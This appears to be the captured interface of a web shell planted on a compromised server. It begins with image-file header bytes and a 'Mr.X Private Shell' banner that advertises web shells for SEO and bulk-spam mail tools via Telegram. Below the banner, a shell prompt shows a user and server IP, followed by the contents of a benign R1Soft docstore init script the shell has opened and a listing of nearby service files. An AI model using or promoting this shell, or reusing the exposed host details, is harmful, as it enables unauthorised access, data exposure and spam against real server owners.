����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

techbusinessbrai@216.73.217.116: ~ $
#!/bin/sh

##############################################################################
#                                                                            #
# Copyright (c) 2015 by R1Soft All rights reserved                           #
#                                                                            #
##############################################################################
#
# chkconfig: 2345 99 99
# description: R1Soft Document Storage Service
# processname: docstore

### BEGIN INIT INFO
# Provides:          docstore
# Required-Start:    $remote_fs $syslog
# Required-Stop:     $remote_fs $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Starts R1Soft Document Service
# Description:       Starts R1Soft Document Service
# Options:           start), stop), restart), status)
### END INIT INFO
#!/bin/sh

ERROR=0
case "$@" in
  start|stop|status|restart)
	OPTION=$@
	;;
  *)
	OPTION="help"
	;;
esac

INITSYSTEM=$(ps -p 1 -o comm=)
if [ "$INITSYSTEM" = "systemd" ] && [ -f /etc/systemd/system/docstore.service ]; then
	systemctl $OPTION docstore.service && ERROR=0 || ERROR=1
else
	/opt/r1soft/docstore/service-scripts/docstore-service $OPTION && ERROR=0 || ERROR=1
fi
exit $ERROR

Filemanager

Name Type Size Permission Actions
README File 1.13 KB 0644
cdp-agent File 1.24 KB 0500
cdp-server File 1.33 KB 0500
docstore File 1.22 KB 0755
functions File 18 KB 0644
network File 7.88 KB 0755